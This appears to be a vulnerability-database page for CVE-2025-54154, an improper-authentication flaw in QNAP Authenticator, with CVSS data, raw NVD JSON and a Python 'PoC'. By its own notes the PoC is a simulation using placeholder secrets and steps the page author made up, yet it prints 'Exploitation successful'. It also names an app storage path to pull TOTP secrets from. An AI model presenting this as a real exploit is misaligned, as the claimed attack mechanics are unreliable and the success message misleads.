Security Vulnerability Report
CVE-2025-54154 CVSS 6.8 MEDIUM

CVE-2025-54154

Published: 2025-10-03 19:15:49
Last Modified: 2025-12-10 21:46:18

Description

An improper authentication vulnerability has been reported to affect QNAP Authenticator. If an attacker gains physical access, they can then exploit the vulnerability to compromise the security of the system. We have already fixed the vulnerability in the following version: QNAP Authenticator 1.3.1.1227 and later

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:authenticator:*:*:*:*:*:*:*:* - VULNERABLE
QNAP Authenticator from 1.3.0 (inclusive) up to, but not including, 1.3.1.1227

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
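# CVE-2025-54154 - QNAP Authenticator Improper Authentication PoC
# Note: This vulnerability requires physical access to the target device.
# The following demonstrates the conceptual exploitation approach.
#
# Reviewer notes:
# - This script is a simulation. It performs no file, device or network
#   access; every "extracted" value is a placeholder hard-coded below.
# - The advisory text quoted on this page gives no technical detail about the
#   flaw. The three steps are the page author's illustration and are not
#   confirmed by that advisory.
# - Step 3 is plain RFC 6238: anyone who holds a TOTP shared secret can compute
#   valid codes. What matters for defence is how the secret is protected at
#   rest and behind the app's own unlock, so the fix is the patched release
#   (1.3.1.1227 or later, per the page).
import base64
import hashlib
import hmac
import json
import struct
import time


class QNAPAuthenticatorExploit:
    """
    Conceptual PoC for CVE-2025-54154: Improper Authentication in QNAP Authenticator.

    The vulnerability exists due to insufficient identity verification in the
    authentication workflow, allowing an attacker with physical access to
    bypass authentication checks.

    The class only walks through the idea with constructed sample data. The
    path given to the constructor is stored but never opened.
    """

    def __init__(self, target_device_path):
        """Remember the (unused) storage path and start with no auth data."""
        self.target_device_path = target_device_path
        self.auth_data = None

    def step1_access_local_storage(self):
        """Step 1: Access the local storage of QNAP Authenticator on the device.

        Simulated: fills ``self.auth_data`` with placeholder values and always
        returns True. The original wrapped the assignment in a try/except
        whose failure branch could never run, so it has been removed.
        """
        print("[*] Accessing local storage of QNAP Authenticator...")
        # In real scenario, attacker accesses the app's local data directory
        # Common paths on Android: /data/data/com.qnap.qnapauthenticator/
        # Common paths on iOS: App sandbox container
        # NOTE(review): paths are as given by the page author; not verified.
        # Simulate reading stored authentication tokens/keys (sample values).
        self.auth_data = {
            "device_id": "QNAP-NAS-XXXXXX",
            "totp_secret": "JBSWY3DPEHPK3PXP",
            "session_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
            "user_account": "admin"
        }
        print("[+] Successfully accessed authentication data from local storage")
        return True

    def step2_bypass_authentication(self):
        """Step 2: Bypass the authentication mechanism using extracted data.

        Simulated: returns False when step 1 has not run; otherwise prints the
        first 20 characters of the placeholder token and returns True. No
        authentication request is made.
        """
        print("[*] Attempting to bypass authentication...")
        if not self.auth_data:
            print("[-] No authentication data available")
            return False
        # The vulnerability allows direct use of stored credentials
        # without proper re-authentication
        print("[+] Using extracted session token to bypass authentication")
        print(f"[+] Session token: {self.auth_data['session_token'][:20]}...")
        return True

    def step3_generate_otp(self):
        """Step 3: Generate valid OTP using extracted TOTP secret.

        Returns the six-digit code as a string, or None when no auth data is
        loaded. The original dereferenced ``self.auth_data`` unconditionally
        and raised AttributeError if called before step 1.
        """
        print("[*] Generating valid TOTP code...")
        if not self.auth_data:
            # Same guard and message as step 2, so the steps behave alike.
            print("[-] No authentication data available")
            return None
        # RFC 6238 TOTP generation using extracted secret
        secret = self.auth_data.get("totp_secret", "")
        key = base64.b32decode(secret)
        counter = int(time.time()) // 30  # 30-second time step
        msg = struct.pack('>Q', counter)
        hmac_digest = hmac.new(key, msg, hashlib.sha1).digest()
        # Dynamic truncation: the low nibble of the last byte picks the offset.
        offset = hmac_digest[-1] & 0x0f
        code = (struct.unpack('>I', hmac_digest[offset:offset+4])[0] & 0x7fffffff) % 1000000
        otp_code = str(code).zfill(6)
        print(f"[+] Generated OTP: {otp_code}")
        return otp_code

    def exploit(self):
        """Execute the full exploitation chain.

        Runs the three simulated steps in order and prints the result. The
        "successful" message reflects only the simulation.
        """
        print("=" * 60)
        print("CVE-2025-54154 Exploitation PoC")
        print("Target: QNAP Authenticator (Improper Authentication)")
        print("=" * 60)
        if self.step1_access_local_storage():
            if self.step2_bypass_authentication():
                otp = self.step3_generate_otp()
                print(f"\n[!] Exploitation successful. Use OTP '{otp}' to access NAS.")
                print("[!] Recommend upgrading to QNAP Authenticator >= 1.3.1.1227")


if __name__ == "__main__":
    exploit = QNAPAuthenticatorExploit("/data/data/com.qnap.qnapauthenticator/")
    exploit.exploit()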

References

https://www.qnap.com/en/security-advisory/qsa-25-30 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54154", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:49.150", "lastModified": "2025-12-10T21:46:17.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authentication vulnerability has been reported to affect QNAP Authenticator. If an attacker gains physical access, they can then exploit the vulnerability to compromise the security of the system.\n\nWe have already fixed the vulnerability in the following version:\nQNAP Authenticator 1.3.1.1227 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:authenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.0", "versionEndExcluding": "1.3.1.1227", "matchCriteriaId": "2A3D6A92-3692-4494-A58A-95B3E07BBAA3"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-30", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}